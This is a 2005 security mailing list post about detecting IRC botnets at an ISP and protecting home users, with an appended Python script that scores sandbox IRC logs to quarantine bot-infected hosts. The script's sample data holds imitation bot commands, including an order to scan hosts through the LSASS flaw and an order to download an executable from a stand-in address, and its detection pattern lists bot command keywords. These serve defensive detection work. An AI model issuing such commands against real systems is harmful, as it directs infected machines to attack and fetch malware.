Firewall Wizards mailing list archives

Re: The home user problem returns


From: Mason Schmitt <mason () schmitt ca>
Date: Thu, 08 Sep 2005 00:13:28 -0700

Kevin wrote:
We take this a step further -- let all traffic that hits the blocks talk
to a "sandbox" minimal IRCd, and if the traffic looks like bot chatter,
quarantine the source host.

We just run a very basic IRCd, modified to generate a log event for
each PRIVMSG, JOIN, NICK and other similar command issued by
any client.  We can also look at the original destination IP they
addressed, and check this against a list of known C&C channels.


That's a very cool approach.  I imagine that I could do that for all
outbound IRC traffic, by using a snort sig.  That would be easier for me
to maintain as it would be part of a more generic tool that I would
already have in place (don't have an IDS yet, but it's on my list for
sometime in the next few months).

I'm somewhat sceptical that some "live chat" buttons actually invoke IRC.
Or Invader Zim webboard for that matter ;)  Are you sure?  Can you give me
a real example?


The first "real" user who complained had clicked through from JDate,
and suddenly found himself chatting with 37 instances of SDBot...


I imagine that SDBot wouldn't make a very good date.

As for Invader Zim, see http://www.badbadrubberpiggy.com/chat.php/


Man, I thought you made that up!

Well, now that you have pointed this out, that pushes me back a step.
Perhaps I should approach this in a similar manner to the way that
SpamAssassin tackles spam.  Rather than make black or white decisions
based upon a single bit of info, perhaps I should check for multiple
events and attempt to correlate them...  Ugh, that sounds like a lot of
work.  Maybe OSSIM can handle some of the event correlation for me.

Isn't that the idea behind Sourcefire's 3D system?  Have multiple agents
and correlate data in real time in order to block threats?  I think that
multiple agent event correlation makes a ton of sense.  Is anyone doing
it well (that we could afford...)?

I know that somewhere Marcus is getting ready to unfurl his IPS rant
(/me braces himself).  Sorry Marcus, I honestly don't see how I can
avoid this kind of system.  I actually had customers that got angry when
I tried to block spam from getting to them!  They said that it was
theirs to block, not mine.  We've since moved to a subscription model
for spam protection.  A public ISP just cannot be run like a corporate
network, it's a totally different beast.  In fact, I know a lot of
techies that would argue that ISPs should be totally transparent.  In
this day and age, I consider that view to be selfish and irresponsible.
If we had a full customer base of nothing but security conscious
computer geeks, then it wouldn't be an issue, but that's not the case.
This network is full of boomers and retirees, running versions of Windows
other than XP SP2, that are paying us for access to the net and some of
them get upset when we call them up because they have a virus.

Marcus and most of the rest of you, please keep preaching solid security
principles to businesses and governments, but when it comes to the home
user, you're wasting your breath.

As with any security endeavour, a multi-faceted or "defence in depth"
solution is the best solution.  When it comes to the home user, this is
equally true.  Here are a few of the issues that I see and some of my
thoughts on the matter.

User education
----------------
User education still needs to happen, but this is going to be a very
slow ship to turn around, because right now, there is just too much
flashy crap distracting everyone.  Home users are getting digital
cameras and colour printers then trying to hook them up; they're getting
wireless devices and struggling with those; they've heard about free
music and movies and they want a piece of that and they want to burn
them to dvds; they want to have animated smiley faces in their email and
IM conversations; they want it to be dead easy for their cell phones to
do all sorts of things and on and on and on.  Those struggling with
their new wireless router have probably never heard of WEP or WPA, and
if they have, it's likely not enough to know that WEP, WEP+ and WPA are
all eminently crackable and that such a thing as war driving exists.
The average home user downloading music and movies may have heard that
it's illegal, but they don't see how it can be, because everyone is
doing it.  They probably also don't know that the Britney Spears song
they just downloaded that didn't play was actually a trojan.  They are
probably unaware that the free p2p app they used came with 10 pieces of
spyware that will report all sorts of interesting things to people they
have never met.  What about going to a site that offers free smiley
faces?  That seems innocuous doesn't it?  Wrong again.  Now some IE bug
has just been exploited to install more spyware.

This is all far too much for your average home user to grasp let alone
keep up with the details.  I can't keep up with the details myself and I
love this stuff and do it all day everyday.  The root of the home user
problem is really rampant consumerism, but fighting that battle is not
one that's going to be won by computer security people.

I think that we should start by helping people to understand that the
Internet is not some *thing* that they connect to.  When they go online,
they become part of a very small world (literally - check out what small
world theory experiments have shown about the net) in which anyone
anywhere in the world, friendly or not, is able to reach their computer
in under a second.  This means that the bad parts of town (any town, all
towns, all countries) are now right on your doorstep, knocking at the
doors of your bank and favourite shopping haunts and even your
government repositories of whatever information they have on you.

However, I also don't think there is reason to panic.  Home users upon
hearing the preceding news, can be reassured that there are things that
they can do to protect themselves and it won't require them to learn
much about computers (a big fear for a lot of people).  They can be told
that if they do the 4 steps to basic security that they have just taken
a big chunk out of the problem (firewall, antivirus....).  And once you
have told them that, then you should either do it for them or have them
take it to a good tech.  They can be told that a computer is like a car,
it needs regular maintenance, by a PROFESSIONAL!  The current state of
computers and the security battle is too complicated for your average
home user and is getting beyond the capacity of most back yard mechanic
types too.  Beyond those basic steps, it gets more difficult.  Somehow
people need to learn to question.  They need to start thinking about
trust and in whom they place their trust and whether that trust is
warranted.  Think of p2p file sharing and clicking on links in IM from
people you have never met before.


Business and Government Education
-----------------------------------
Hopefully that's as far as home user ed needs to go right now.  Now we
have business and government education to deal with.  Both should be
approached in the same way that home users were approached above.  Start
with some basic measures.  Really, the same 4 measures apply, but just
on a larger more complicated scale and with many more possible
permutations of implementation.  In addition to the fab 4, business
needs to be more familiar with the fifth Beatle - BACKUPS.  As with the
home user, these basic defences start to take the edge off the problem.
In order for business to not get stupid about how they implement these
4/5 basics, they should read Marcus' "Low Carb Security" article in
LOOP. Or think of the KISS principle. Or, if you admire Einstein think
of his quote, "Things should be made as simple as possible, but not any
simpler"

Business and government also face the same issues as the home user when
it comes to questioning and trust.  Think of the recent thread on this
list concerning CardSystems.


Caretakers
-------------
I don't believe in a dog eat dog world.  I think that those that have
the means need to take care of those that don't.

To that end, it is my opinion that ISPs need to provide some solid front
line defences for their customers while not being so restrictive, or
more importantly unwilling to really listen to their users, as to limit
innovation and expression.  ISPs have left their customers to the wolves
for too long and are now paying the price.

I also believe that the same applies to software houses.  I know that
everyone pokes at Microsoft, but they really are a prime example of a
company that has left their users out to dry for a long time.  They too
are now paying the price.  They also appear to be taking positive action
so perhaps they will redeem themselves... _somewhat_

In both these cases, greed and willing ignorance have played major roles
in getting us to where we are now.

The standards groups and all interested parties need to keep working
diligently on really basic protocol issues such as SMTP.

And again, we come back to trust.  Trust is poised to be a huge part of
the Internet infrastructure.  We need functional, ubiquitous healthy
trust systems so that home users can have some means of making the trust
decisions they are faced with and which they are now completely
incapable of addressing adequately.  Most of the trust issues that home
users face are not accessible to them anyway - again think of CardSystems.


Law Makers / Enforcers
------------------------
I may not think the world is a dog eat dog world, but I'm also not
stupid enough to believe that there are not scads of people out there
willing to get what they want in any way they can.  This is where law
and law enforcement come into the picture.  Because we are dealing with
a global communications network, our laws and policing methods need to
reflect that.

It's getting late and I'm running out of steam, so I'll leave this
stream of consciousness here, where it ground to a halt, and say good
night.  If any of you have had the patience to read this far, thanks for
reading.

--
Mason
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
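Editor's note: the two ideas in the message above, Kevin's sandbox IRCd that logs every NICK/JOIN/PRIVMSG and checks the original destination against a C&C list, and Mason's suggestion to score and correlate several weak signals SpamAssassin-style instead of deciding on one bit of information, can be combined in a small correlation script. The following is an added example written for this archive page; it is not code from either poster or from any IRCd. The log line format, the nick and command regexes, the weights, the threshold and the sample addresses (all from RFC 5737 TEST-NET ranges) are assumptions made for illustration.

```python
"""Score sandbox-IRCd events per source host, SpamAssassin style (added example).

Assumed log format, one line per client command: src=<client ip> dst=<original dest ip>
cmd=<IRC command> args=<rest of the command>.  Weights and patterns are illustrative.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) cmd=(?P<cmd>[A-Z]+)(?: args=(?P<args>.*))?$"
)
# Machine-generated nicks built from a template such as [00|USA|XP|92831] (assumed pattern).
BOT_NICK_RE = re.compile(r"^\[?[A-Za-z0-9]{1,4}\|[A-Za-z0-9|\]\-]{3,}$")
# Channel messages that look like bot commands: ".scan.start ...", "!download ..." (assumed).
BOT_CMD_RE = re.compile(r"^[.!](scan|download|update|ddos|syn|udp|exec|login)\b", re.I)

WEIGHTS = {
    "known_cnc_dst": 5.0,   # original destination is on the C&C list (counted once per host)
    "template_nick": 2.0,   # nick looks machine-generated
    "bot_command": 3.0,     # PRIVMSG text looks like a bot command
    "herd_channel": 2.0,    # HERD_MIN or more sandboxed hosts joined the same channel
}
HERD_MIN = 3
THRESHOLD = 5.0


def parse_line(line):
    """Return the event fields as a dict, or None if the line is not an event."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["args"] = ev["args"] or ""
    return ev


def score_events(lines, cnc_hosts):
    """Correlate all events per source host; returns {src: (score, [rules that fired])}."""
    scores = defaultdict(float)
    reasons = defaultdict(list)
    joins = defaultdict(set)  # channel -> set of sources that joined it

    def hit(src, rule):
        scores[src] += WEIGHTS[rule]
        reasons[src].append(rule)

    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # unparseable input is skipped, never trusted
        src, dst, cmd, args = ev["src"], ev["dst"], ev["cmd"], ev["args"]
        if dst in cnc_hosts and "known_cnc_dst" not in reasons[src]:
            hit(src, "known_cnc_dst")
        if cmd == "NICK" and BOT_NICK_RE.match(args):
            hit(src, "template_nick")
        elif cmd == "JOIN":
            channel = args.split()[0] if args else ""  # "JOIN #chan [key]"
            joins[channel.lower()].add(src)
        elif cmd == "PRIVMSG":
            _, _, text = args.partition(":")  # "PRIVMSG <target> :<text>"
            if BOT_CMD_RE.match(text.strip()):
                hit(src, "bot_command")

    # Second pass: many sandboxed hosts converging on one channel is herd behaviour,
    # a signal no single event shows.
    for members in joins.values():
        if len(members) >= HERD_MIN:
            for src in members:
                hit(src, "herd_channel")

    return {src: (scores[src], reasons[src]) for src in scores}


def quarantine(lines, cnc_hosts, threshold=THRESHOLD):
    """Sorted list of sources whose correlated score reaches the threshold."""
    return sorted(src for src, (score, _) in score_events(lines, cnc_hosts).items()
                  if score >= threshold)


# Constructed sample data: a C&C list with one entry and a short sandbox log.
KNOWN_CNC = {"198.51.100.7"}
SAMPLE_LOG = """\
src=10.0.0.5 dst=198.51.100.7 cmd=NICK args=[00|USA|XP|92831]
src=10.0.0.5 dst=198.51.100.7 cmd=JOIN args=#b0tz
src=10.0.0.5 dst=198.51.100.7 cmd=PRIVMSG args=#b0tz :.scan.start lsass 100 5 0 -r -s
src=10.0.0.6 dst=203.0.113.9 cmd=NICK args=[01|DEU|2K|55120]
src=10.0.0.6 dst=203.0.113.9 cmd=JOIN args=#b0tz
src=10.0.0.6 dst=203.0.113.9 cmd=PRIVMSG args=#b0tz :!download http://203.0.113.9/up.exe 1
src=10.0.0.7 dst=203.0.113.9 cmd=NICK args=[02|CAN|XP|31877]
src=10.0.0.7 dst=203.0.113.9 cmd=JOIN args=#b0tz
src=10.0.0.9 dst=203.0.113.4 cmd=NICK args=mason_
src=10.0.0.9 dst=203.0.113.4 cmd=JOIN args=#invaderzim
src=10.0.0.9 dst=203.0.113.4 cmd=PRIVMSG args=#invaderzim :hi everyone
this line is not an event
""".splitlines()

if __name__ == "__main__":
    for src, (score, why) in sorted(score_events(SAMPLE_LOG, KNOWN_CNC).items()):
        print(f"{src}: {score:.1f} {why}")
    print("quarantine:", quarantine(SAMPLE_LOG, KNOWN_CNC))
```

With the sample log, the host talking to the listed C&C address is quarantined, the second bot is quarantined on behaviour alone (template nick, bot command, herd channel) even though its destination is unknown, the third bot scores 4.0 and stays below the threshold, and the human chatting on the Invader Zim channel never scores at all. The weights are the tuning knob, exactly as in SpamAssassin: a single indicator such as a template-looking nick is not enough to act on, and the herd rule only fires from the correlated view across hosts.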

